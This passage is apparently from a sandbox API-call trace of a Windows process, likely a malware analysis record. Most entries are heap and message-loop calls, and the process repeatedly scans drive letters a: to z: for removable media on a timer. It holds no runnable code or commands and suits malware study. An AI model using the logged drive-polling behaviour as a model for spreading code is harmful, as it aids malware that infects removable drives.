0x14bd2b0 [0218.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0218.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.263] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.263] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.264] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0218.264] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0218.264] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.264] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.264] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.264] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.264] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0218.264] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.264] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.264] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.265] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.265] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.265] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0218.265] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.265] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.265] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.266] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.266] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.266] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.266] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.266] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.266] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.267] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.267] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.267] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.267] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.267] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.267] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.268] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.268] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.268] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.268] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.268] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.269] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.269] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.269] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.269] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.269] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.269] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.270] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0218.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.272] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0218.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0218.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0218.273] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0218.274] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.274] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.274] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.274] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0218.275] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.275] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0218.275] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0218.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.275] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.275] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0218.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.276] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.276] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.276] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.276] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.277] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.277] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.277] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.277] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.278] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.278] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.278] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.278] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.278] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.279] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.279] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.279] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.279] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.280] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.280] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.280] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.280] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.281] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.281] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.281] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.282] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.282] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.282] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.283] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.283] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.283] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0218.283] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.283] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.283] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.283] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.283] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.283] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.284] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.284] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0218.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0218.284] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0218.284] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.285] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0218.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.285] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.285] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.285] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0218.286] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.286] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.286] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.286] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.286] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.286] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.287] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.287] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.287] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.287] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.287] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.287] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.288] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.288] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.288] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.288] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.288] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.289] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.289] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.289] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.289] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.289] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.308] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.308] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.308] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.308] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.308] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0218.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 